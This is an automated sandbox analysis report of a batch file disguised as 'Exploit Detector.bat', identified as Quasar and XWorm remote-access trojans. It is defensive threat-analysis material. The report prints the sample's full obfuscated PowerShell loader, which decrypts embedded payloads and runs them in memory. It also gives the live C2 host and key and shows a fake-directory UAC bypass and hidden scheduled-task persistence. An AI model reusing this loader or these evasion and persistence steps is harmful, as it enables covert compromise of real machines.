quasar | d1a6da3bb5b455c45056ff4b7e29270c29728e6e1add468a9a3e8ff88d6c3afb

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
10-11-2024 09:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Exploit Detector.bat
Size

156KB
MD5

c88c0f71749f8575068070333359f5b5
SHA1

af3cbd68266ab3b90bef8db45f8e22e1f4d9d121
SHA256

d1a6da3bb5b455c45056ff4b7e29270c29728e6e1add468a9a3e8ff88d6c3afb
SHA512

da549a0f953591baf4021dfb09f6b3afc0ff93dc58c430b90688583c5c43808393506389d97668b5f5d923b8258154d0a66c7f33ddaef7667bbf05fb45ef2fa4
SSDEEP

3072:pvmWfV9iV9C860i3eCYGBZ/Mf89esLbgVQBF7t+a39Qn4bo:Rdf2+nRBCf89/LESJSko

Score

10^/10

quasar xworm office04 defense_evasion execution rat spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

walkout.ddnsgeek.com:8080

Mutex

27391f85-a482-471a-b2cd-1f8ab5bde32e

Attributes

encryption_key
6469F8C5BA9A2CFDCF4A3F1651D1E92DBEA41117
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Extracted

Family

xworm

Version

5.0

Mutex

MQh1F5RA5WIKm4RA

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/2716-142-0x000001F7E8B80000-0x000001F7E8B8E000-memory.dmp	family_xworm

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/2652-92-0x000001DC5ED00000-0x000001DC5F024000-memory.dmp	family_quasar

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 47 IoCs

flow	pid	Process
13	5028	powershell.exe
15	2716	powershell.exe
19	2652	powershell.exe
21	2652	powershell.exe
25	2652	powershell.exe
29	2716	powershell.exe
31	2716	powershell.exe
32	2716	powershell.exe
33	2716	powershell.exe
43	2716	powershell.exe
47	2716	powershell.exe
48	2716	powershell.exe
49	2716	powershell.exe
50	2716	powershell.exe
51	2716	powershell.exe
52	2716	powershell.exe
53	2716	powershell.exe
54	2716	powershell.exe
55	2716	powershell.exe
58	2716	powershell.exe
59	2716	powershell.exe
60	2716	powershell.exe
61	2716	powershell.exe
62	2716	powershell.exe
66	2716	powershell.exe
67	2716	powershell.exe
68	2716	powershell.exe
69	2716	powershell.exe
72	2716	powershell.exe
73	2716	powershell.exe
74	2716	powershell.exe
75	2716	powershell.exe
76	2716	powershell.exe
77	2716	powershell.exe
78	2716	powershell.exe
79	2716	powershell.exe
80	2716	powershell.exe
81	2716	powershell.exe
82	2716	powershell.exe
83	2716	powershell.exe
84	2716	powershell.exe
85	2716	powershell.exe
86	2716	powershell.exe
87	2716	powershell.exe
88	2716	powershell.exe
89	2716	powershell.exe
90	2716	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1748	powershell.exe
2652	powershell.exe
3916	powershell.exe
4572	powershell.exe
1448	powershell.exe
2636	powershell.exe
3508	powershell.exe
944	powershell.exe
4500	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
756	ComputerDefaults.exe

Loads dropped DLL 1 IoCs

pid	Process
756	ComputerDefaults.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Suspicious behavior: EnumeratesProcesses 37 IoCs

pid	Process
5028	powershell.exe
5028	powershell.exe
1748	powershell.exe
1748	powershell.exe
2652	powershell.exe
2652	powershell.exe
2652	powershell.exe
2716	powershell.exe
2716	powershell.exe
2716	powershell.exe
2636	powershell.exe
2636	powershell.exe
2636	powershell.exe
3508	powershell.exe
3508	powershell.exe
3508	powershell.exe
944	powershell.exe
944	powershell.exe
3248	powershell.exe
3248	powershell.exe
944	powershell.exe
3248	powershell.exe
4500	powershell.exe
4500	powershell.exe
4500	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe
3216	powershell.exe
3216	powershell.exe
3216	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5028	powershell.exe
Token: SeDebugPrivilege	1748	powershell.exe
Token: SeDebugPrivilege	2652	powershell.exe
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	2636	powershell.exe
Token: SeDebugPrivilege	3508	powershell.exe
Token: SeDebugPrivilege	944	powershell.exe
Token: SeDebugPrivilege	3248	powershell.exe
Token: SeIncreaseQuotaPrivilege	3248	powershell.exe
Token: SeSecurityPrivilege	3248	powershell.exe
Token: SeTakeOwnershipPrivilege	3248	powershell.exe
Token: SeLoadDriverPrivilege	3248	powershell.exe
Token: SeSystemProfilePrivilege	3248	powershell.exe
Token: SeSystemtimePrivilege	3248	powershell.exe
Token: SeProfSingleProcessPrivilege	3248	powershell.exe
Token: SeIncBasePriorityPrivilege	3248	powershell.exe
Token: SeCreatePagefilePrivilege	3248	powershell.exe
Token: SeBackupPrivilege	3248	powershell.exe
Token: SeRestorePrivilege	3248	powershell.exe
Token: SeShutdownPrivilege	3248	powershell.exe
Token: SeDebugPrivilege	3248	powershell.exe
Token: SeSystemEnvironmentPrivilege	3248	powershell.exe
Token: SeRemoteShutdownPrivilege	3248	powershell.exe
Token: SeUndockPrivilege	3248	powershell.exe
Token: SeManageVolumePrivilege	3248	powershell.exe
Token: 33	3248	powershell.exe
Token: 34	3248	powershell.exe
Token: 35	3248	powershell.exe
Token: 36	3248	powershell.exe
Token: SeDebugPrivilege	4500	powershell.exe
Token: SeIncreaseQuotaPrivilege	4500	powershell.exe
Token: SeSecurityPrivilege	4500	powershell.exe
Token: SeTakeOwnershipPrivilege	4500	powershell.exe
Token: SeLoadDriverPrivilege	4500	powershell.exe
Token: SeSystemProfilePrivilege	4500	powershell.exe
Token: SeSystemtimePrivilege	4500	powershell.exe
Token: SeProfSingleProcessPrivilege	4500	powershell.exe
Token: SeIncBasePriorityPrivilege	4500	powershell.exe
Token: SeCreatePagefilePrivilege	4500	powershell.exe
Token: SeBackupPrivilege	4500	powershell.exe
Token: SeRestorePrivilege	4500	powershell.exe
Token: SeShutdownPrivilege	4500	powershell.exe
Token: SeDebugPrivilege	4500	powershell.exe
Token: SeSystemEnvironmentPrivilege	4500	powershell.exe
Token: SeRemoteShutdownPrivilege	4500	powershell.exe
Token: SeUndockPrivilege	4500	powershell.exe
Token: SeManageVolumePrivilege	4500	powershell.exe
Token: 33	4500	powershell.exe
Token: 34	4500	powershell.exe
Token: 35	4500	powershell.exe
Token: 36	4500	powershell.exe
Token: SeIncreaseQuotaPrivilege	4500	powershell.exe
Token: SeSecurityPrivilege	4500	powershell.exe
Token: SeTakeOwnershipPrivilege	4500	powershell.exe
Token: SeLoadDriverPrivilege	4500	powershell.exe
Token: SeSystemProfilePrivilege	4500	powershell.exe
Token: SeSystemtimePrivilege	4500	powershell.exe
Token: SeProfSingleProcessPrivilege	4500	powershell.exe
Token: SeIncBasePriorityPrivilege	4500	powershell.exe
Token: SeCreatePagefilePrivilege	4500	powershell.exe
Token: SeBackupPrivilege	4500	powershell.exe
Token: SeRestorePrivilege	4500	powershell.exe
Token: SeShutdownPrivilege	4500	powershell.exe
Token: SeDebugPrivilege	4500	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2652	powershell.exe

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 2088 wrote to memory of 2452	2088	cmd.exe	89
PID 2088 wrote to memory of 2452	2088	cmd.exe	89
PID 2088 wrote to memory of 5028	2088	cmd.exe	90
PID 2088 wrote to memory of 5028	2088	cmd.exe	90
PID 5028 wrote to memory of 1748	5028	powershell.exe	91
PID 5028 wrote to memory of 1748	5028	powershell.exe	91
PID 5028 wrote to memory of 4336	5028	powershell.exe	96
PID 5028 wrote to memory of 4336	5028	powershell.exe	96
PID 5028 wrote to memory of 4544	5028	powershell.exe	98
PID 5028 wrote to memory of 4544	5028	powershell.exe	98
PID 4544 wrote to memory of 756	4544	cmd.exe	100
PID 4544 wrote to memory of 756	4544	cmd.exe	100
PID 756 wrote to memory of 2216	756	ComputerDefaults.exe	101
PID 756 wrote to memory of 2216	756	ComputerDefaults.exe	101
PID 2216 wrote to memory of 1652	2216	cmd.exe	103
PID 2216 wrote to memory of 1652	2216	cmd.exe	103
PID 4336 wrote to memory of 544	4336	cmd.exe	106
PID 4336 wrote to memory of 544	4336	cmd.exe	106
PID 4336 wrote to memory of 2652	4336	cmd.exe	107
PID 4336 wrote to memory of 2652	4336	cmd.exe	107
PID 1652 wrote to memory of 1876	1652	cmd.exe	108
PID 1652 wrote to memory of 1876	1652	cmd.exe	108
PID 1652 wrote to memory of 2716	1652	cmd.exe	109
PID 1652 wrote to memory of 2716	1652	cmd.exe	109
PID 2652 wrote to memory of 2636	2652	powershell.exe	110
PID 2652 wrote to memory of 2636	2652	powershell.exe	110
PID 2716 wrote to memory of 3508	2716	powershell.exe	111
PID 2716 wrote to memory of 3508	2716	powershell.exe	111
PID 2716 wrote to memory of 744	2716	powershell.exe	116
PID 2716 wrote to memory of 744	2716	powershell.exe	116
PID 2716 wrote to memory of 944	2716	powershell.exe	118
PID 2716 wrote to memory of 944	2716	powershell.exe	118
PID 2716 wrote to memory of 3248	2716	powershell.exe	120
PID 2716 wrote to memory of 3248	2716	powershell.exe	120
PID 2716 wrote to memory of 4500	2716	powershell.exe	123
PID 2716 wrote to memory of 4500	2716	powershell.exe	123
PID 744 wrote to memory of 3156	744	cmd.exe	125
PID 744 wrote to memory of 3156	744	cmd.exe	125
PID 744 wrote to memory of 3916	744	cmd.exe	126
PID 744 wrote to memory of 3916	744	cmd.exe	126
PID 5028 wrote to memory of 1952	5028	powershell.exe	127
PID 5028 wrote to memory of 1952	5028	powershell.exe	127
PID 5028 wrote to memory of 3216	5028	powershell.exe	129
PID 5028 wrote to memory of 3216	5028	powershell.exe	129
PID 3916 wrote to memory of 4572	3916	powershell.exe	131
PID 3916 wrote to memory of 4572	3916	powershell.exe	131
PID 5028 wrote to memory of 1448	5028	powershell.exe	132
PID 5028 wrote to memory of 1448	5028	powershell.exe	132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Exploit Detector.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('CaBNPFufqG/Ty3CUXy9EKmZ0sYpFg7Md+6rAZ0/TxhU='); $aes_var.IV=[System.Convert]::FromBase64String('S/RVoa3ixa8FZY/sBX5WEg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$hsUWk=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$yefxQ=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$duVIf=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($hsUWk, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $duVIf.CopyTo($yefxQ); $duVIf.Dispose(); $hsUWk.Dispose(); $yefxQ.Dispose(); $yefxQ.ToArray();}function execute_function($param_var,$param2_var){ IEX '$jXYNL=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$GLWuz=$jXYNL.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$GLWuz.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$AfZnh = 'C:\Users\Admin\AppData\Local\Temp\Exploit Detector.bat';$host.UI.RawUI.WindowTitle = $AfZnh;$BPwyt=[System.IO.File]::ReadAllText($AfZnh).Split([Environment]::NewLine);foreach ($MIYkU in $BPwyt) { if ($MIYkU.StartsWith('itiQGYtwhhNApDlOfuVM')) { $whOtj=$MIYkU.Substring(20); break; }}$payloads_var=[string[]]$whOtj.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
  2⤵
  PID:2452
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5028
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4336
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('dZwBIL8mRiTZatOT8DHuTDuk3Oo1l68JNKsZ1rANWLs='); $aes_var.IV=[System.Convert]::FromBase64String('VRFaPmL5cO3W99Q3sAgvnA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Sopqh=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$LWDBe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$TccZi=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Sopqh, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $TccZi.CopyTo($LWDBe); $TccZi.Dispose(); $Sopqh.Dispose(); $LWDBe.Dispose(); $LWDBe.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MWnnv=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$jHyaV=$MWnnv.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jHyaV.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$mjRKG = 'C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd';$host.UI.RawUI.WindowTitle = $mjRKG;$ysPnv=[System.IO.File]::ReadAllText($mjRKG).Split([Environment]::NewLine);foreach ($akrhi in $ysPnv) { if ($akrhi.StartsWith('dUMGHfMAItMYvjVTxFtd')) { $XDrXi=$akrhi.Substring(20); break; }}$payloads_var=[string[]]$XDrXi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
      4⤵
      PID:544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2652
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2636
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4544
  - - C:\Windows \System32\ComputerDefaults.exe
      "C:\Windows \System32\ComputerDefaults.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:756
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SC.cmd"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2216
      - C:\Windows\system32\cmd.exe
        
        cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SC.cmd"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1652
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('CaBNPFufqG/Ty3CUXy9EKmZ0sYpFg7Md+6rAZ0/TxhU='); $aes_var.IV=[System.Convert]::FromBase64String('S/RVoa3ixa8FZY/sBX5WEg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$hsUWk=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$yefxQ=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$duVIf=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($hsUWk, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $duVIf.CopyTo($yefxQ); $duVIf.Dispose(); $hsUWk.Dispose(); $yefxQ.Dispose(); $yefxQ.ToArray();}function execute_function($param_var,$param2_var){ IEX '$jXYNL=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$GLWuz=$jXYNL.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$GLWuz.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$AfZnh = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $AfZnh;$BPwyt=[System.IO.File]::ReadAllText($AfZnh).Split([Environment]::NewLine);foreach ($MIYkU in $BPwyt) { if ($MIYkU.StartsWith('itiQGYtwhhNApDlOfuVM')) { $whOtj=$MIYkU.Substring(20); break; }}$payloads_var=[string[]]$whOtj.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
        7⤵
        
        PID:1876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        7⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2716
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3508
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd" "
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('dZwBIL8mRiTZatOT8DHuTDuk3Oo1l68JNKsZ1rANWLs='); $aes_var.IV=[System.Convert]::FromBase64String('VRFaPmL5cO3W99Q3sAgvnA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Sopqh=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$LWDBe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$TccZi=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Sopqh, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $TccZi.CopyTo($LWDBe); $TccZi.Dispose(); $Sopqh.Dispose(); $LWDBe.Dispose(); $LWDBe.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MWnnv=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$jHyaV=$MWnnv.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jHyaV.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$mjRKG = 'C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd';$host.UI.RawUI.WindowTitle = $mjRKG;$ysPnv=[System.IO.File]::ReadAllText($mjRKG).Split([Environment]::NewLine);foreach ($akrhi in $ysPnv) { if ($akrhi.StartsWith('dUMGHfMAItMYvjVTxFtd')) { $XDrXi=$akrhi.Substring(20); break; }}$payloads_var=[string[]]$XDrXi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
        9⤵
        
        PID:3156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4500
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
    3⤵
    PID:1952
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\Exploit Detector')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3216
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1448

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3f01549ee3e4c18244797530b588dad9

SHA1
3e87863fc06995fe4b741357c68931221d6cc0b9

SHA256
36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

SHA512
73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
ddea04e541c0570e6b66ace35e12627f

SHA1
9419507375c6ac78c43eb118c5ce25132a99a928

SHA256
93e4b841d6014e7823a4e41512e8fbd135efecff1ca0d59bece7dda83d947fc8

SHA512
a089c5753cfe87091a8be66efc813a072d7160150f5fa600f9a51bc923c583f49d045beed53f63e64181a1916b6d5bc8c4c7edb2ffc7b4762ec08ed21a08708d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
e4e39c101c9268d1285e3820a5e50c56

SHA1
